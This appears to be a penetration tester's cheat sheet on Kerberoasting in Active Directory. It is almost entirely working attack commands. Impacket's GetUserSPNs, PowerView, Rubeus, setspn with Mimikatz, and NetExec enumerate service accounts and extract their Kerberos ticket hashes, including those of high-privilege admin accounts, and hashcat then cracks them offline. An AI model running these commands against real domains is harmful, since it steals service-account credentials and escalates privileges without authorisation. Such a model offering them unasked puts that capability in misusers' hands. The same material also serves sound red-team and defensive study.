Kerberoasting
Kerberoasting is a privilege escalation technique that exploits Kerberos authentication to obtain service account credentials. The attack targets accounts with a configured Service Principal Name (SPN), a unique identifier in Active Directory used to associate a service with a specific account. Attackers request service tickets (TGS), extract the encrypted password hashes, and attempt offline cracking to gain unauthorized access.
Linux
# Note: 'rezydev' is the user whose Credentials/NTLM Hash I have.
# Lists SPN Accounts
python3 /path/to/GetUserSPNs.py -dc-ip 10.10.10.10 REZYDEV.LOCAL/rezydev:password
# Request TGS Tickets from all SPN Accounts
python3 /path/to/GetUserSPNs.py -dc-ip 10.10.10.10 REZYDEV.LOCAL/rezydev:password -request
# Request TGS Ticket for user 'jethalal'
python3 /path/to/GetUserSPNs.py -dc-ip 10.10.10.10 REZYDEV.LOCAL/rezydev:password -request-user jethalal
# Note: Use flag '-outputfile filename' to save TGS Tickets in a file for cracking
Windows
- PowerView
- Rubeus
- Half-Manual
Import-Module .\PowerView.ps1 # Import PowerView
Get-DomainUser * -spn | select samaccountname # Lists SPN Accounts
# Get TGS Ticket in Hashcat Crackable Format for user 'http_svc'
Get-DomainUser -Identity http_svc | Get-DomainSPNTicket -Format Hashcat
# Same as above but copyable hash
(Get-DomainUser -Identity http_svc | Get-DomainSPNTicket -Format Hashcat).Hash -join "" | Out-File -Encoding ascii C:\Windows\Temp\hash.txt
# Export All TGS for all SPN set users to a .csv file for cracking
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\tgs.csv -NoTypeInformation
# List all kerberoastable users with ticket
.\Rubeus.exe kerberoast /nowrap
# Shows stats.
.\Rubeus.exe kerberoast /stats
# Extracts Kerberos ticket hashes for user rezydev
.\Rubeus.exe kerberoast /user:rezydev /nowrap
# Extracts Kerberos ticket hashes for high-privilege accounts.
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
## Note: /tgtdeleg flag will only request RC4 (type 23) encrypted hashes
## (rather than AES-128/256 - type 18) but this doesn't work for
## 'Windows Server 2019' or higher.
# List SPN Accounts
setspn.exe -Q */*
# Request Kerberos Tickets
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "svcSQLserv/BLRMS200833152.rezydev.local:1433"
# This will load tickets into memory, and then we will use Mimikatz to extract
# the TGS tickets from memory.
mimikatz> base64 /out:true # Encodes output in Base64 format (else kirbi files)
mimikatz> kerberos::list /export # Lists and exports Kerberos tickets
echo "<base64-ticket>" | tr -d \\n > b64tgsfile # remove new lines
cat b64tgsfile | base64 -d > file.kirbi
# We can now use 'kirbi2john.py' and attempt to crack it offline.
Quick Win using NetExec
# Credential is required :D
nxc ldap dc01.rezydev.local -u 'rezydev' -p 'Password123@' --kerberoasting hashesOut.txt
Crack the Hash
hashcat -m 13100 hashesOut.txt /usr/share/wordlist/rockyou.txt